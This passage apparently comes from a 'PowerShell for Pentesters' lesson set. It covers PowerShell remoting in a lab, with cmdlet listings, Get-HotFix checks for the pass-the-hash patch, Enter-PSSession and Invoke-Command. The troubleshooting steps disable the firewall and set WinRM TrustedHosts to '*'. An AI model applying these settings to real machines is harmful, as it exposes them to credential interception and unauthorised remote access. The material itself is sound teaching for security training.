DateFunctions module.\n\n import-module -name DateFunctions -prefix ZZ\n\n For more information, see Import-Module and Import-PSSession.\n\n\nSEE ALSO\n about_Path_Syntax\n about_Aliases\n about_Functions\n Alias (provider)\n Function (provider)\n Get-Command\n Import-Module\n Import-PSSession\nPS C:\\Users\\Windows-32>\n```\n" }, { "path": "20-Remoting-Part-1.md", "content": "#### 20. Remoting Part 1\n\n###### Running Cmdlets on remote computers\n\n- Help topics for ```Remoting```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Help *remote*\n\nName Category Module Synopsis\n---- -------- ------ --------\nGet-RDRemoteApp Function RemoteDesktop ...\nNew-RDRemoteApp Function RemoteDesktop ...\nSet-RDRemoteApp Function RemoteDesktop ...\nRemove-RDRemoteApp Function RemoteDesktop ...\nGet-RDRemoteDesktop Function RemoteDesktop ...\nSet-RDRemoteDesktop Function RemoteDesktop ...\nabout_Remote HelpFile Describes how to run remote commands in Windows PowerShell.\nabout_Remote_Disconnected_Sess... HelpFile Explains how to disconnect from and reconnect to a PSSession\nabout_Remote_FAQ HelpFile Contains questions and answers about running remote commands\nabout_Remote_Jobs HelpFile Describes how to run background jobs on remote computers.\nabout_Remote_Output HelpFile Describes how to interpret and format the output of remote commands.\nabout_Remote_Requirements HelpFile Describes the system requirements and configuration requirements for\nabout_Remote_Troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell.\nabout_Remote_Variables HelpFile Explains how to use local and remote variables in remote\n\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Cmdlet``` which accept parameter ```ComputerName```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Command -CommandType Cmdlet -ParameterName ComputerName\n\nCommandType Name ModuleName\n----------- ---- ----------\nCmdlet Add-Computer Microsoft.PowerShell.Management\nCmdlet Clear-EventLog Microsoft.PowerShell.Management\nCmdlet Connect-PSSession Microsoft.PowerShell.Core\nCmdlet Enter-PSSession Microsoft.PowerShell.Core\nCmdlet Get-EventLog Microsoft.PowerShell.Management\nCmdlet Get-HotFix Microsoft.PowerShell.Management\nCmdlet Get-Process Microsoft.PowerShell.Management\nCmdlet Get-PSSession Microsoft.PowerShell.Core\nCmdlet Get-Service Microsoft.PowerShell.Management\nCmdlet Get-WmiObject Microsoft.PowerShell.Management\nCmdlet Invoke-Command Microsoft.PowerShell.Core\nCmdlet Invoke-WmiMethod Microsoft.PowerShell.Management\nCmdlet Limit-EventLog Microsoft.PowerShell.Management\nCmdlet New-EventLog Microsoft.PowerShell.Management\nCmdlet New-PSSession Microsoft.PowerShell.Core\nCmdlet Receive-Job Microsoft.PowerShell.Core\nCmdlet Receive-PSSession Microsoft.PowerShell.Core\nCmdlet Register-WmiEvent Microsoft.PowerShell.Management\nCmdlet Remove-Computer Microsoft.PowerShell.Management\nCmdlet Remove-EventLog Microsoft.PowerShell.Management\nCmdlet Remove-PSSession Microsoft.PowerShell.Core\nCmdlet Remove-WmiObject Microsoft.PowerShell.Management\nCmdlet Rename-Computer Microsoft.PowerShell.Management\nCmdlet Restart-Computer Microsoft.PowerShell.Management\nCmdlet Set-Service Microsoft.PowerShell.Management\nCmdlet Set-WmiInstance Microsoft.PowerShell.Management\nCmdlet Show-EventLog Microsoft.PowerShell.Management\nCmdlet Stop-Computer Microsoft.PowerShell.Management\nCmdlet Test-Connection Microsoft.PowerShell.Management\nCmdlet Write-EventLog Microsoft.PowerShell.Management\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Windows10-32> Get-Command -CommandType Cmdlet | Where-Object {$_.Parameters.Keys -contains 'ComputerName'}\n\nCommandType Name Version Source\n----------- ---- ------- ------\nCmdlet Add-Computer 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Clear-EventLog 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Connect-PSSession 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Enter-PSSession 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Get-EventLog 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Get-HotFix 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Get-Process 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Get-PSSession 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Get-Service 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Get-WmiObject 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Invoke-Command 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Invoke-WmiMethod 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Limit-EventLog 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet New-EventLog 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet New-PSSession 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Receive-Job 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Receive-PSSession 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Register-WmiEvent 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Remove-Computer 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Remove-EventLog 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Remove-PSSession 3.0.0.0 Microsoft.PowerShell.Core\nCmdlet Remove-WmiObject 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Rename-Computer 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Restart-Computer 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Set-Service 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Set-WmiInstance 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Show-EventLog 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Stop-Computer 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Test-Connection 3.1.0.0 Microsoft.PowerShell.Management\nCmdlet Write-EventLog 3.1.0.0 Microsoft.PowerShell.Management\n\nPS C:\\Users\\Windows10-32>\n```\n\n- ```Cmdlet``` which accept parameter ```ComputerName``` and ```Credential```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Command -CommandType Cmdlet -ParameterName ComputerName,Credential\n\nCommandType Name ModuleName\n----------- ---- ----------\nCmdlet Add-Computer Microsoft.PowerShell.Management\nCmdlet Add-Content Microsoft.PowerShell.Management\nCmdlet Clear-Content Microsoft.PowerShell.Management\nCmdlet Clear-EventLog Microsoft.PowerShell.Management\nCmdlet Clear-Item Microsoft.PowerShell.Management\nCmdlet Clear-ItemProperty Microsoft.PowerShell.Management\nCmdlet Connect-PSSession Microsoft.PowerShell.Core\nCmdlet Copy-Item Microsoft.PowerShell.Management\nCmdlet Copy-ItemProperty Microsoft.PowerShell.Management\nCmdlet Enter-PSSession Microsoft.PowerShell.Core\nCmdlet Get-Content Microsoft.PowerShell.Management\nCmdlet Get-EventLog Microsoft.PowerShell.Management\nCmdlet Get-HotFix Microsoft.PowerShell.Management\nCmdlet Get-Item Microsoft.PowerShell.Management\nCmdlet Get-ItemProperty Microsoft.PowerShell.Management\nCmdlet Get-Process Microsoft.PowerShell.Management\nCmdlet Get-PSSession Microsoft.PowerShell.Core\nCmdlet Get-Service Microsoft.PowerShell.Management\nCmdlet Get-WmiObject Microsoft.PowerShell.Management\nCmdlet Invoke-Command Microsoft.PowerShell.Core\nCmdlet Invoke-Item Microsoft.PowerShell.Management\nCmdlet Invoke-WmiMethod Microsoft.PowerShell.Management\nCmdlet Join-Path Microsoft.PowerShell.Management\nCmdlet Limit-EventLog Microsoft.PowerShell.Management\nCmdlet Move-Item Microsoft.PowerShell.Management\nCmdlet Move-ItemProperty Microsoft.PowerShell.Management\nCmdlet New-EventLog Microsoft.PowerShell.Management\nCmdlet New-Item Microsoft.PowerShell.Management\nCmdlet New-ItemProperty Microsoft.PowerShell.Management\nCmdlet New-PSDrive Microsoft.PowerShell.Management\nCmdlet New-PSSession Microsoft.PowerShell.Core\nCmdlet New-Service Microsoft.PowerShell.Management\nCmdlet New-WebServiceProxy Microsoft.PowerShell.Management\nCmdlet Receive-Job Microsoft.PowerShell.Core\nCmdlet Receive-PSSession Microsoft.PowerShell.Core\nCmdlet Register-WmiEvent Microsoft.PowerShell.Management\nCmdlet Remove-Computer Microsoft.PowerShell.Management\nCmdlet Remove-EventLog Microsoft.PowerShell.Management\nCmdlet Remove-Item Microsoft.PowerShell.Management\nCmdlet Remove-ItemProperty Microsoft.PowerShell.Management\nCmdlet Remove-PSSession Microsoft.PowerShell.Core\nCmdlet Remove-WmiObject Microsoft.PowerShell.Management\nCmdlet Rename-Computer Microsoft.PowerShell.Management\nCmdlet Rename-Item Microsoft.PowerShell.Management\nCmdlet Rename-ItemProperty Microsoft.PowerShell.Management\nCmdlet Reset-ComputerMachinePassword Microsoft.PowerShell.Management\nCmdlet Resolve-Path Microsoft.PowerShell.Management\nCmdlet Restart-Computer Microsoft.PowerShell.Management\nCmdlet Save-Help Microsoft.PowerShell.Core\nCmdlet Set-Content Microsoft.PowerShell.Management\nCmdlet Set-Item Microsoft.PowerShell.Management\nCmdlet Set-ItemProperty Microsoft.PowerShell.Management\nCmdlet Set-Service Microsoft.PowerShell.Management\nCmdlet Set-WmiInstance Microsoft.PowerShell.Management\nCmdlet Show-EventLog Microsoft.PowerShell.Management\nCmdlet Split-Path Microsoft.PowerShell.Management\nCmdlet Start-Job Microsoft.PowerShell.Core\nCmdlet Start-Process Microsoft.PowerShell.Management\nCmdlet Stop-Computer Microsoft.PowerShell.Management\nCmdlet Test-ComputerSecureChannel Microsoft.PowerShell.Management\nCmdlet Test-Connection Microsoft.PowerShell.Management\nCmdlet Test-Path Microsoft.PowerShell.Management\nCmdlet Update-Help Microsoft.PowerShell.Core\nCmdlet Write-EventLog Microsoft.PowerShell.Management\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Command -CommandType Cmdlet | Where-Object {$_.Parameters.Keys -contains 'ComputerName' -and $_.Parameters.Keys -contains 'Credential'}\n\nCommandType Name ModuleName\n----------- ---- ----------\nCmdlet Add-Computer Microsoft.PowerShell.Management\nCmdlet Connect-PSSession Microsoft.PowerShell.Core\nCmdlet Enter-PSSession Microsoft.PowerShell.Core\nCmdlet Get-HotFix Microsoft.PowerShell.Management\nCmdlet Get-PSSession Microsoft.PowerShell.Core\nCmdlet Get-WmiObject Microsoft.PowerShell.Management\nCmdlet Invoke-Command Microsoft.PowerShell.Core\nCmdlet Invoke-WmiMethod Microsoft.PowerShell.Management\nCmdlet New-PSSession Microsoft.PowerShell.Core\nCmdlet Receive-PSSession Microsoft.PowerShell.Core\nCmdlet Register-WmiEvent Microsoft.PowerShell.Management\nCmdlet Remove-WmiObject Microsoft.PowerShell.Management\nCmdlet Restart-Computer Microsoft.PowerShell.Management\nCmdlet Set-WmiInstance Microsoft.PowerShell.Management\nCmdlet Stop-Computer Microsoft.PowerShell.Management\nCmdlet Test-Connection Microsoft.PowerShell.Management\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Cmdlet``` which accept parameter ```ComputerName``` and not ```Session ```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Command -CommandType Cmdlet | Where-Object {$_.Parameters.Keys -contains 'ComputerName' -and $_.Parameters.Keys -notcontains 'Session'}\n\nCommandType Name ModuleName\n----------- ---- ----------\nCmdlet Add-Computer Microsoft.PowerShell.Management\nCmdlet Clear-EventLog Microsoft.PowerShell.Management\nCmdlet Get-EventLog Microsoft.PowerShell.Management\nCmdlet Get-HotFix Microsoft.PowerShell.Management\nCmdlet Get-Process Microsoft.PowerShell.Management\nCmdlet Get-PSSession Microsoft.PowerShell.Core\nCmdlet Get-Service Microsoft.PowerShell.Management\nCmdlet Get-WmiObject Microsoft.PowerShell.Management\nCmdlet Invoke-WmiMethod Microsoft.PowerShell.Management\nCmdlet Limit-EventLog Microsoft.PowerShell.Management\nCmdlet New-EventLog Microsoft.PowerShell.Management\nCmdlet Register-WmiEvent Microsoft.PowerShell.Management\nCmdlet Remove-Computer Microsoft.PowerShell.Management\nCmdlet Remove-EventLog Microsoft.PowerShell.Management\nCmdlet Remove-WmiObject Microsoft.PowerShell.Management\nCmdlet Rename-Computer Microsoft.PowerShell.Management\nCmdlet Restart-Computer Microsoft.PowerShell.Management\nCmdlet Set-Service Microsoft.PowerShell.Management\nCmdlet Set-WmiInstance Microsoft.PowerShell.Management\nCmdlet Show-EventLog Microsoft.PowerShell.Management\nCmdlet Stop-Computer Microsoft.PowerShell.Management\nCmdlet Test-Connection Microsoft.PowerShell.Management\nCmdlet Write-EventLog Microsoft.PowerShell.Management\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Get-Member``` will enumerate the properties and methods of that object\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Command -CommandType Cmdlet | Get-Member\n\n\n TypeName: System.Management.Automation.CmdletInfo\n\nName MemberType Definition\n---- ---------- ----------\nEquals Method bool Equals(System.Object obj)\nGetHashCode Method int GetHashCode()\nGetType Method type GetType()\nResolveParameter Method System.Management.Automation.ParameterMetadata ResolveParameter(string name)\nToString Method string ToString()\nCommandType Property System.Management.Automation.CommandTypes CommandType {get;}\nDefaultParameterSet Property string DefaultParameterSet {get;}\nDefinition Property string Definition {get;}\nHelpFile Property string HelpFile {get;}\nImplementingType Property type ImplementingType {get;}\nModule Property psmoduleinfo Module {get;}\nModuleName Property string ModuleName {get;}\nName Property string Name {get;}\nNoun Property string Noun {get;}\nOptions Property System.Management.Automation.ScopedItemOptions Options {get;set;}\nOutputType Property System.Collections.ObjectModel.ReadOnlyCollection[System.Management.Automation.PSTypeName] OutputType {get;}\nParameters Property System.Collections.Generic.Dictionary[string,System.Management.Automation.ParameterMetadata] Parameters {get;}\nParameterSets Property System.Collections.ObjectModel.ReadOnlyCollection[System.Management.Automation.CommandParameterSetInfo] ParameterSets {get;}\nPSSnapIn Property System.Management.Automation.PSSnapInInfo PSSnapIn {get;}\nRemotingCapability Property System.Management.Automation.RemotingCapability RemotingCapability {get;}\nVerb Property string Verb {get;}\nVisibility Property System.Management.Automation.SessionStateEntryVisibility Visibility {get;set;}\nDLL ScriptProperty System.Object DLL {get=$this.ImplementingType.Assembly.Location;}\nHelpUri ScriptProperty System.Object HelpUri {get=$oldProgressPreference = $ProgressPreference...\n\nPS C:\\Users\\Administrator>\n```\n\n- Run ```Get-HotFix``` on the remote machine\n\nIn Local Machine\n\n```PowerShell\nPS C:\\Users\\Administrator> $env:COMPUTERNAME\nWIN-2012-DC\nPS C:\\Users\\Administrator> $env:USERDOMAIN\nPFPT\nPS C:\\Users\\Administrator> $env:USERNAME\nAdministrator\nPS C:\\Users\\Administrator>\n```\n\nIn Remote Machine\n\n```PowerShell\nPS C:\\Windows\\system32> $env:COMPUTERNAME\nJOHN-PC\nPS C:\\Windows\\system32> $env:USERDOMAIN\nJohn-PC\nPS C:\\Windows\\system32> $env:USERNAME\nJohn\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-HotFix -ComputerName JOHN-PC -Credential John-PC\\John\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Enter-PSSession -Credential(Get-Credential) -ComputerName JOHN-PC\n\ncmdlet Get-Credential at command pipeline position 1\nSupply values for the following parameters:\nCredential\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-HotFix\n[JOHN-PC]: PS C:\\Users\\John\\Documents> exit\n```\n\n- ```Test-Connection```\n\n```PowerShell\nPS C:\\Users\\Administrator> foreach ($pc in ('JOHN-PC', 'localhost', 'google.com')) {Test-Connection $pc}\n\nSource Destination IPV4Address IPV6Address Bytes Time(ms)\n------ ----------- ----------- ----------- ----- --------\nWIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0\nWIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0\nWIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0\nWIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0\nWIN-2012-DC localhost 127.0.0.1 ::1 32 0\nWIN-2012-DC localhost 127.0.0.1 ::1 32 0\nWIN-2012-DC localhost 127.0.0.1 ::1 32 0\nWIN-2012-DC localhost 127.0.0.1 ::1 32 0\nWIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 25\nWIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 16\nWIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 15\nWIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 17\n\n\nPS C:\\Users\\Administrator>\n```\n\n###### Exercise\n\n- Set up a Windows 7 VM on your computer.\n- Using ```Get-HotFix``` with the ```–ComputerName``` and ```-Credential``` parameters, check for the presence of ```KB2871997``` (the Pass the hash fix) on the VM\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-HotFix -ComputerName JOHN-PC -Credential John-PC\\John -id KB2871997\nGet-HotFix : Cannot find the requested hotfix on the 'JOHN-PC' computer. Verify the input and run the command again.\nAt line:1 char:1\n+ Get-HotFix -ComputerName JOHN-PC -Credential John-PC\\John -id KB2871997\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : ObjectNotFound: (:) [Get-HotFix], ArgumentException\n + FullyQualifiedErrorId : GetHotFixNoEntriesFound,Microsoft.PowerShell.Commands.GetHotFixCommand\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Enter-PSSession -Credential(Get-Credential) -ComputerName JOHN-PC\n\ncmdlet Get-Credential at command pipeline position 1\nSupply values for the following parameters:\nCredential\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-HotFix\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-HotFix -id KB2871997\nGet-HotFix : This command cannot find hot-fix on the machine 'localhost'. Verify the input and Run your command again.\n + CategoryInfo : ObjectNotFound: (:) [Get-HotFix], ArgumentException\n + FullyQualifiedErrorId : GetHotFixNoEntriesFound,Microsoft.PowerShell.Commands.GetHotFixCommand\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents> exit\nPS C:\\Users\\Administrator>\n```\n\n###### Remoting Issues Fix\n\n- Disable Firewall\n- [```WSMan:\\localhost\\client\\trustedhosts``` on local machine](https://github.com/Kan1shka9/PowerShell-for-Pentesters/blob/master/21-Remoting-Part-2.md#21-remoting-part-2)\n- [Windows Update Module for PowerShell Access Denied on Remote PC in Workgroup](https://community.spiceworks.com/topic/954498-windows-update-module-for-powershell-access-denied-on-remote-pc-in-workgroup?page=1#entry-4650660)\n- [Run remote powershell as administrator](https://serverfault.com/questions/473991/run-remote-powershell-as-administrator)\n" }, { "path": "21-Remoting-Part-2.md", "content": "#### 21. Remoting Part 2\n\n###### PowerShell Remoting\n\n- Based on ```WSMAN``` Protocol and uses ```WinRM```\r - Needs port ```5985(HTTP)``` and ```5986(HTTPS)```\n - Alternate ports possible\r- Using PowerShell Remoting\r - Trusted Domain (No special requirement)\r - WorkGroup ```(WSMan:\\localhost\\client\\trustedhosts)```\n- Running cmdlets which support Remoting\n- Changes made for this to work\n - ```WSMan:\\localhost\\client\\trustedhosts``` on local machine\n - User should be part of local ```administrators group``` on the remote machine\n ![Image of ShowWindow](images/3.jpeg)\n\n- ```Local Machine```\n\n```PowerShell\nPS C:\\Users\\Administrator> $env:COMPUTERNAME\nWIN-2012-DC\nPS C:\\Users\\Administrator> $env:USERDOMAIN\nPFPT\nPS C:\\Users\\Administrator> $env:USERNAME\nAdministrator\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Set-Item WSMan:\\localhost\\Client\\TrustedHosts -Value *\n\nWinRM Security Configuration.\nThis command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be authenticated. The client might send credential information to these computers. Are\nyou sure that you want to modify this list?\n[Y] Yes [N] No [S] Suspend [?] Help (default is \"Y\"): Y\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Item WSMan:\\localhost\\Client\\TrustedHosts\n\n WSManConfig: Microsoft.WSMan.Management\\WSMan::localhost\\Client\n\nType Name SourceOfValue Value\n---- ---- ------------- -----\nSystem.String TrustedHosts *\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Remote Machine```\n\n```PowerShell\nPS C:\\Windows\\system32> $env:COMPUTERNAME\nJOHN-PC\nPS C:\\Windows\\system32> $env:USERDOMAIN\nJohn-PC\nPS C:\\Windows\\system32> $env:USERNAME\nJohn\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Windows\\system32> Set-Item WSMan:\\localhost\\Client\\TrustedHosts -Value *\n\nWinRM Security Configuration.\nThis command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be\nauthenticated. The client might send credential information to these computers. Are you sure that you want to modify\nthis list?\n[Y] Yes [N] No [S] Suspend [?] Help (default is \"Y\"): Y\nPS C:\\Windows\\system32>\n```\n\n```PowerShell\nPS C:\\Windows\\system32> Get-Item WSMan:\\localhost\\Client\\TrustedHosts\n\n WSManConfig: Microsoft.WSMan.Management\\WSMan::localhost\\Client\n\nName Value Type\n---- ----- ----\nTrustedHosts * System.String\n\nPS C:\\Windows\\system32>\n```\n\n- ```Invoke-Command``` Cmdlet\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Help Invoke-Command\n\nNAME\n Invoke-Command\n\nSYNOPSIS\n Runs commands on local and remote computers.\n\n\nSYNTAX\n Invoke-Command [-ScriptBlock] [-ArgumentList ] [-InputObject ] [-NoNewScope] []\n\n Invoke-Command [[-ConnectionUri] ] [-ScriptBlock] [-AllowRedirection] [-ArgumentList ] [-AsJob] [-Authentication ] [-CertificateThumbprint\n ] [-ConfigurationName ] [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName ]\n [-SessionOption ] [-ThrottleLimit ] []\n\n Invoke-Command [[-ConnectionUri] ] [-FilePath] [-AllowRedirection] [-ArgumentList ] [-AsJob] [-Authentication ] [-ConfigurationName ]\n [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName ] [-SessionOption ] [-ThrottleLimit\n ] []\n\n Invoke-Command [[-ComputerName] ] [-FilePath] [-ApplicationName ] [-ArgumentList ] [-AsJob] [-Authentication ] [-ConfigurationName\n ] [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName ] [-Port ] [-SessionName ]\n [-SessionOption ] [-ThrottleLimit ] [-UseSSL] []\n\n Invoke-Command [[-ComputerName] ] [-ScriptBlock] [-ApplicationName ] [-ArgumentList ] [-AsJob] [-Authentication ]\n [-CertificateThumbprint ] [-ConfigurationName ] [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName\n ] [-Port ] [-SessionName ] [-SessionOption ] [-ThrottleLimit ] [-UseSSL] []\n\n Invoke-Command [[-Session] ] [-FilePath] [-ArgumentList ] [-AsJob] [-HideComputerName] [-InputObject ] [-JobName ] [-ThrottleLimit ]\n []\n\n Invoke-Command [[-Session] ] [-ScriptBlock] [-ArgumentList ] [-AsJob] [-HideComputerName] [-InputObject ] [-JobName ] [-ThrottleLimit ]\n []\n\n\nDESCRIPTION\n The Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. With a single Invoke-Command command, you can run commands on\n multiple computers.\n\n To run a single command on a remote computer, use the ComputerName parameter. To run a series of related commands that share data, use the New-PSSession cmdlet to create a PSSession (a persistent\n connection) on the remote computer, and then use the Session parameter of Invoke-Command to run the command in the PSSession. To run a command in a disconnected session, use the\n InDisconnectedSession parameter. To run a command in a background job, use the AsJob parameter.\n\n You can also use Invoke-Command on a local computer to evaluate or run a string in a script block as a command. Windows PowerShell converts the script block to a command and runs the command\n immediately in the current scope, instead of just echoing the string at the command line.\n\n To start an interactive session with a remote computer, use the Enter-PSSession cmdlet. To establish a persistent connection to a remote computer, use the New-PSSession cmdlet.\n\n Before using Invoke-Command to run commands on a remote computer, read about_Remote (http://go.microsoft.com/fwlink/?LinkID=135182).\n\n\nRELATED LINKS\n Online Version: http://go.microsoft.com/fwlink/p/?linkid=289592\n Enter-PSSession\n Exit-PSSession\n Get-PSSession\n Invoke-Item\n New-PSSession\n Remove-PSSession\n WSMan Provider\n about_PSSessions\n about_Remote\n about_Remote_Disconnected_Sessions\n about_Remote_Variables\n about_Scopes\n\nREMARKS\n To see the examples, type: \"get-help Invoke-Command -examples\".\n For more information, type: \"get-help Invoke-Command -detailed\".\n For technical information, type: \"get-help Invoke-Command -full\".\n For online help, type: \"get-help Invoke-Command -online\"\n\n\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Help Invoke-Command -ShowWindow\n```\n\n![Image of ShowWindow](images/2.jpeg)\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {$env:COMPUTERNAME} -ComputerName JOHN-PC -Credential John-PC\\John\nJOHN-PC\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {Get-Process} -ComputerName JOHN-PC -Credential John-PC\\John\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName\n------- ------ ----- ----- ----- ------ -- ----------- --------------\n 23 2 1756 2156 30 0.00 1288 cmd JOHN-PC\n 40 3 708 3240 42 0.04 1220 conhost JOHN-PC\n 39 3 1448 4024 43 0.05 2496 conhost JOHN-PC\n 402 5 1112 2504 33 0.09 352 csrss JOHN-PC\n 181 6 1092 3592 32 0.26 408 csrss JOHN-PC\n 79 3 852 3156 20 0.03 3256 dllhost JOHN-PC\n 66 3 892 3260 38 0.02 912 dwm JOHN-PC\n 664 21 17020 26036 166 0.79 696 explorer JOHN-PC\n 0 0 0 12 0 0 Idle JOHN-PC\n 728 12 2864 7396 32 0.59 492 lsass JOHN-PC\n 195 5 1604 3744 23 0.05 500 lsm JOHN-PC\n 56 3 804 4056 57 0.05 3160 notepad JOHN-PC\n 501 12 23192 35896 165 0.49 2476 powershell JOHN-PC\n 134 5 6272 9764 63 0.12 2924 python JOHN-PC\n 609 15 16336 10160 83 0.31 1664 SearchIndexer JOHN-PC\n 185 7 3788 5588 34 0.62 476 services JOHN-PC\n 29 1 216 572 4 0.06 272 smss JOHN-PC\n 282 9 4356 5960 58 0.02 1356 spoolsv JOHN-PC\n 347 7 2436 5236 34 0.26 624 svchost JOHN-PC\n 261 8 2104 4396 26 0.22 736 svchost JOHN-PC\n 546 13 14104 11804 77 0.31 788 svchost JOHN-PC\n 523 13 21164 26988 99 1.93 872 svchost JOHN-PC\n 1069 27 13456 22276 102 1.15 960 svchost JOHN-PC\n 472 17 5964 9996 55 0.32 1124 svchost JOHN-PC\n 683 25 11148 11708 79 0.29 1232 svchost JOHN-PC\n 305 24 10576 9060 48 0.45 1392 svchost JOHN-PC\n 349 15 4768 9200 66 0.14 1500 svchost JOHN-PC\n 372 36 147480 18128 213 10.30 1956 svchost JOHN-PC\n 347 13 7864 9624 64 0.35 2772 svchost JOHN-PC\n 548 0 44 548 2 4 System JOHN-PC\n 138 8 1972 4452 38 0.05 1292 taskhost JOHN-PC\n 115 5 1436 3420 44 0.07 684 VBoxService JOHN-PC\n 138 5 1236 4392 61 0.03 2104 VBoxTray JOHN-PC\n 74 5 780 2748 32 0.23 400 wininit JOHN-PC\n 113 4 1492 3740 39 0.27 448 winlogon JOHN-PC\n 414 15 7332 4444 107 0.29 556 wmpnetwk JOHN-PC\n 210 10 27708 35636 139 1.03 2640 wsmprovhost JOHN-PC\n\nPS C:\\Users\\Administrator>\n```" }, { "path": "22-Powershell-Remoting-Part-3.md", "content": "#### 22. Powershell Remoting Part 3\n\n###### PowerShell Remoting – One-to-One\n\n- Interactive Session - ```PSSession```\n - Runs in a new process ```(wsmprovhost)```\n - Is Stateful\n- Using PSSessions\n - Initiating\n - Interacting\n - Closing\n\n- ```PowerShell Version```\n\n```PowerShell\nPS C:\\Users\\Administrator> $PSVersionTable\n\nName Value\n---- -----\nPSVersion 4.0\nWSManStackVersion 3.0\nSerializationVersion 1.1.0.1\nCLRVersion 4.0.30319.34014\nBuildVersion 6.3.9600.16394\nPSCompatibleVersions {1.0, 2.0, 3.0, 4.0}\nPSRemotingProtocolVersion 2.2\n\nPS C:\\Users\\Administrator>\n```\n\n- Help on ```session```\n\n```PowerShell\nPS C:\\Users\\Administrator> help *session*\n\nSet-PSSessionConfiguration Cmdlet Microsoft.PowerShell.Core Changes the properties of a registered session configuration.\nEnable-PSSessionConfiguration Cmdlet Microsoft.PowerShell.Core Enables the session configurations on the local computer.\nDisable-PSSessionConfiguration Cmdlet Microsoft.PowerShell.Core Disables session configurations on the local computer.\nNew-PSSession Cmdlet Microsoft.PowerShell.Core Creates a persistent connection to a local or remote computer.\nDisconnect-PSSession Cmdlet Microsoft.PowerShell.Core Disconnects from a session.\nConnect-PSSession Cmdlet Microsoft.PowerShell.Core Reconnects to disconnected sessions\nReceive-PSSession Cmdlet Microsoft.PowerShell.Core Gets results of commands in disconnected sessions\nGet-PSSession Cmdlet Microsoft.PowerShell.Core Gets the Windows PowerShell sessions on local and remote computers.\nRemove-PSSession Cmdlet Microsoft.PowerShell.Core Closes one or more Windows PowerShell sessions (PSSessions).\nEnter-PSSession Cmdlet Microsoft.PowerShell.Core Starts an interactive session with a remote computer.\nExit-PSSession Cmdlet 